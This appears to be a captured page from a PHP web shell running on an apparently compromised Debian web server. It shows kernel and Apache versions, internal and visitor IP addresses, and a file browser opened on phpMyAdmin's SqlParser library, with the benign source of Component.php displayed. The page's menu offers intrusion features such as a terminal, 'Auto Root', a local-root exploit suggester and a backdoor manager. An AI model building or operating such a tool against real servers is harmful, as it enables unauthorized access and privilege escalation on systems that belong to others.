Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
PhpMyAdmin /
SqlParser /
Delete
Unzip
Name
Size
Permission
Date
Action
Components
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
Contexts
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
Exceptions
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
Statements
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
Tools
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
Utils
[ DIR ]
drwxr-xr-x
2025-06-07 09:54
Component.php
2.13
KB
-rw-r--r--
2023-01-25 10:43
Context.php
26
KB
-rw-r--r--
2023-01-25 10:43
Core.php
1.01
KB
-rw-r--r--
2023-01-25 10:43
Lexer.php
35.31
KB
-rw-r--r--
2023-01-25 10:43
Parser.php
21.8
KB
-rw-r--r--
2023-01-25 10:43
Statement.php
17.84
KB
-rw-r--r--
2023-01-25 10:43
Token.php
9.27
KB
-rw-r--r--
2023-01-25 10:43
TokensList.php
5.59
KB
-rw-r--r--
2023-01-25 10:43
Translator.php
1.61
KB
-rw-r--r--
2023-01-25 10:43
UtfString.php
10.3
KB
-rw-r--r--
2023-01-25 10:43
autoload.php
9.41
KB
-rw-r--r--
2023-01-31 12:40
Save
Rename
<?php declare(strict_types=1); namespace PhpMyAdmin\SqlParser; use Exception; use Stringable; /** * Defines a component that is later extended to parse specialized components or keywords. * * There is a small difference between *Component and *Keyword classes: usually, *Component parsers can be reused in * multiple situations and *Keyword parsers count on the *Component classes to do their job. * * A component (of a statement) is a part of a statement that is common to multiple query types. */ abstract class Component implements Stringable { /** * Parses the tokens contained in the given list in the context of the given * parser. * * @param Parser $parser the parser that serves as context * @param TokensList $list the list of tokens that are being parsed * @param array<string, mixed> $options parameters for parsing * * @return mixed * * @throws Exception not implemented yet. */ public static function parse( Parser $parser, TokensList $list, array $options = [] ) { // This method should be abstract, but it can't be both static and // abstract. throw new Exception(Translator::gettext('Not implemented yet.')); } /** * Builds the string representation of a component of this type. * * In other words, this function represents the inverse function of * `static::parse`. * * @param mixed $component the component to be built * @param array<string, mixed> $options parameters for building * * @return mixed * * @throws Exception not implemented yet. */ public static function build($component, array $options = []) { // This method should be abstract, but it can't be both static and // abstract. throw new Exception(Translator::gettext('Not implemented yet.')); } /** * Builds the string representation of a component of this type. * * @see static::build * * @return string */ public function __toString() { return static::build($this); } }